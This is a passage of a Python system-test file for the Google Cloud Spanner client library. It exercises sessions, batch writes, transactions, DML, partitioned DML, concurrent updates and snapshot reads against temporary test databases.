AllTypesRowData.__new__.__defaults__ = tuple(None for _ in ALL_TYPES_COLUMNS)
EmulatorAllTypesRowData = collections.namedtuple(
"EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = tuple(
    None for _ in EMULATOR_ALL_TYPES_COLUMNS
)
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
AllTypesRowData(pkey=208, numeric_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
EMULATOR_ALL_TYPES_ROWDATA = (
# all nulls
EmulatorAllTypesRowData(pkey=0),
# Non-null values
EmulatorAllTypesRowData(pkey=101, int_value=123),
EmulatorAllTypesRowData(pkey=102, bool_value=False),
EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
EmulatorAllTypesRowData(pkey=201, int_array=[]),
EmulatorAllTypesRowData(pkey=202, bool_array=[]),
EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
EmulatorAllTypesRowData(pkey=204, date_array=[]),
EmulatorAllTypesRowData(pkey=205, float_array=[]),
EmulatorAllTypesRowData(pkey=206, string_array=[]),
EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
super(TestSessionAPI, self).setUp()
self.to_delete = []
def tearDown(self):
super(TestSessionAPI, self).tearDown()
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 4)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 2}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"columns": self.COLUMNS,
"table_id": self.TABLE,
}
),
span=span_list[3],
)
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if USE_EMULATOR:
all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
else:
all_types_columns = ALL_TYPES_COLUMNS
all_types_rowdata = ALL_TYPES_ROWDATA
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
        email = "phred@example.com"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 8)
self.assertSpanAttributes(
"CloudSpanner.CreateSession",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 1}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.BeginTransaction",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[3],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[4],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[5],
)
self.assertSpanAttributes(
"CloudSpanner.Rollback",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[6],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[7],
)
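    # Helper for run_in_transaction: insert rows, then raise so the wrapper
    # must roll the transaction back instead of committing it.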
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
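    # Build one INSERT ... VALUES statement per ROW_DATA row for the DML tests.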
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
# [START spanner_test_dml_rollback_txn_not_committed]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
result = transaction.execute_sql(insert_statement)
list(result) # iterate to get stats
self.assertEqual(result.stats.row_count_exact, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_rollback_txn_not_committed]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_read_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
for insert_statement in self._generate_insert_statements():
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
# Rows inserted via DML *can* be read before commit.
during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(during_rows)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_update_then_insert_commit(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
row_count = transaction.execute_update(insert_statement)
self.assertEqual(row_count, 1)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA[1:])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_update]
# [END spanner_test_dml_with_mutation]
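    # Surface a non-OK batch_update status as the matching google.api_core exception.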
@staticmethod
def _check_batch_status(status_code, expected=code_pb2.OK):
if status_code != expected:
grpc_status_code = _STATUS_CODE_TO_GRPC_STATUS_CODE[status_code]
call = FauxCall(status_code)
raise exceptions.from_grpc_status(
grpc_status_code, "batch_update failed", errors=[call]
)
def test_transaction_batch_update_success(self):
# [START spanner_test_dml_with_mutation]
# [START spanner_test_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
        update_statement = (
            "UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
            {"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
# [END spanner_test_dml_with_mutation]
# [END spanner_test_dml_update]
def test_transaction_batch_update_and_execute_dml(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statements = list(self._generate_insert_statements())
update_statements = [
            (
                "UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
                {"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
]
delete_statement = "DELETE contacts WHERE TRUE;"
def unit_of_work(transaction, self):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
insert_statements + update_statements
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), len(insert_statements) + 1)
for row_count in row_counts:
self.assertEqual(row_count, 1)
row_count = transaction.execute_update(delete_statement)
self.assertEqual(row_count, len(insert_statements))
session.run_in_transaction(unit_of_work, self)
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows, [])
def test_transaction_batch_update_w_syntax_error(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
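        # "UPDTAE" is misspelled on purpose to provoke INVALID_ARGUMENT.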
        update_statement = (
            "UPDTAE contacts SET email = @email " "WHERE contact_id = @contact_id;",
            {"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code, code_pb2.INVALID_ARGUMENT)
self.assertEqual(len(row_counts), 1)
self.assertEqual(row_counts[0], 1)
session.run_in_transaction(unit_of_work)
def test_transaction_batch_update_wo_statements(self):
from google.api_core.exceptions import InvalidArgument
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.transaction() as transaction:
with self.assertRaises(InvalidArgument):
transaction.batch_update([])
def test_transaction_batch_update_w_parent_span(self):
try:
from opentelemetry import trace
except ImportError:
return
tracer = trace.get_tracer(__name__)
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
insert_statement = list(self._generate_insert_statements())[0]
        update_statement = (
            "UPDATE contacts SET email = @email " "WHERE contact_id = @contact_id;",
            {"contact_id": 1, "email": "phreddy@example.com"},
{"contact_id": param_types.INT64, "email": param_types.STRING},
)
delete_statement = (
"DELETE contacts WHERE contact_id = @contact_id;",
{"contact_id": 1},
{"contact_id": param_types.INT64},
)
def unit_of_work(transaction, self):
status, row_counts = transaction.batch_update(
[insert_statement, update_statement, delete_statement]
)
self._check_batch_status(status.code)
self.assertEqual(len(row_counts), 3)
for row_count in row_counts:
self.assertEqual(row_count, 1)
with tracer.start_as_current_span("Test Span"):
session.run_in_transaction(unit_of_work, self)
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 6)
self.assertEqual(
list(map(lambda span: span.name, span_list)),
[
"CloudSpanner.CreateSession",
"CloudSpanner.Commit",
"CloudSpanner.BeginTransaction",
"CloudSpanner.DMLTransaction",
"CloudSpanner.Commit",
"Test Span",
],
)
for span in span_list[2:-1]:
self.assertEqual(span.context.trace_id, span_list[-1].context.trace_id)
self.assertEqual(span.parent.span_id, span_list[-1].context.span_id)
def test_execute_partitioned_dml(self):
# [START spanner_test_dml_partioned_dml_update]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
delete_statement = "DELETE FROM {} WHERE true".format(self.TABLE)
def _setup_table(txn):
txn.execute_update(delete_statement)
for insert_statement in self._generate_insert_statements():
txn.execute_update(insert_statement)
committed = self._db.run_in_transaction(_setup_table)
with self._db.snapshot(read_timestamp=committed) as snapshot:
before_pdml = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(before_pdml)
        nonesuch = "nonesuch@example.com"
        target = "phred@example.com"
update_statement = (
"UPDATE {table} SET {table}.email = @email " "WHERE {table}.email = @target"
).format(table=self.TABLE)
row_count = self._db.execute_partitioned_dml(
update_statement,
params={"email": nonesuch, "target": target},
param_types={"email": param_types.STRING, "target": param_types.STRING},
)
self.assertEqual(row_count, 1)
row = self.ROW_DATA[0]
updated = [row[:3] + (nonesuch,)] + list(self.ROW_DATA[1:])
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_update = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_update, updated)
row_count = self._db.execute_partitioned_dml(delete_statement)
self.assertEqual(row_count, len(self.ROW_DATA))
with self._db.snapshot(read_timestamp=committed) as snapshot:
after_delete = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(after_delete, [])
# [END spanner_test_dml_partioned_dml_update]
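    # Run the same read-modify-write unit of work from several threads; Spanner
    # aborts and retries conflicting transactions, so every increment must land.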
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]]
)
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_sessions.append(self._db)
threads = [
threading.Thread(
target=txn_session.run_in_transaction, args=(unit_of_work, pkey)
)
for txn_session in txn_sessions
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
with self._db.snapshot() as snapshot:
keyset = KeySet(keys=[(pkey,)])
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
pkey = "read_w_concurrent_updates"
self._transaction_concurrency_helper(self._read_w_concurrent_update, pkey)
def _query_w_concurrent_update(self, transaction, pkey):
sql = "SELECT * FROM counters WHERE name = @name"
rows = list(
transaction.execute_sql(
sql, params={"name": pkey}, param_types={"name": param_types.STRING}
)
)
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
pkey = "query_w_concurrent_updates"
self._transaction_concurrency_helper(self._query_w_concurrent_update, pkey)
@unittest.skipIf(USE_EMULATOR, "Skipping concurrent transactions")
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
trigger = _ReadAbortTrigger()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[trigger.KEY1, 0], [trigger.KEY2, 0]]
)
provoker = threading.Thread(target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
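    # Generate deterministic (pkey, first, last, email) contact rows.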
@staticmethod
def _row_data(max_index):
for index in range(max_index):
            yield (
                index,
                "First%09d" % (index,),
                "Last%09d" % (max_index - index),
                "test-%09d@example.com" % (index,),
            )
def _set_up_table(self, row_count, database=None):
if database is None:
database = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(database.reload)()
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = database.run_in_transaction(_unit_of_work, test=self)
return committed
def test_read_with_single_keys_index(self):
# [START spanner_test_single_key_index_read]
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
row = 5
keyset = [[expected[row][0], expected[row][1]]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [expected[row]])
# [END spanner_test_single_key_index_read]
def test_empty_read_with_single_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
keyset = [["Non", "Existent"]]
with self._db.snapshot() as snapshot:
results_iter = snapshot.read(
self.TABLE, columns, KeySet(keys=keyset), index="name"
)
rows = list(results_iter)
self.assertEqual(rows, [])
def test_read_with_multiple_keys_index(self):
row_count = 10
columns = self.COLUMNS[1], self.COLUMNS[2]
self._set_up_table(row_count)
expected = [[row[1], row[2]] for row in self._row_data(row_count)]
with self._db.snapshot() as snapshot:
rows = list(
snapshot.read(self.TABLE, columns, KeySet(keys=expected), index="name")
)
self.assertEqual(rows, expected)
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
row_count = 400
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
with self._db.snapshot(read_timestamp=committed) as read_tx:
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
with self._db.snapshot(min_read_timestamp=committed) as min_read_ts:
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
with self._db.snapshot(max_staleness=staleness) as max_staleness:
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
with self._db.snapshot(exact_staleness=staleness) as exact_staleness:
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
with self._db.snapshot() as strong:
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(multi_use=True) as strong:
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
row_count = 40
committed = self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
with self._db.snapshot(read_timestamp=committed, multi_use=True) as read_ts:
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
row_count = 40
self._set_up_table(row_count)
all_data_rows = list(self._row_data(row_count))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
with self._db.snapshot(exact_staleness=delta, multi_use=True) as exact:
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_index(self):
row_count = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = ["CREATE INDEX contacts_by_last_name ON contacts(last_name)"]
pool = BurstyPool(labels={"testcase": "read_w_index"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
temp_db = Config.INSTANCE.database(
"test_read" + unique_resource_id("_"),
ddl_statements=ddl_statements + EXTRA_DDL,
pool=pool,
)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
committed = self._set_up_table(row_count, database=temp_db)
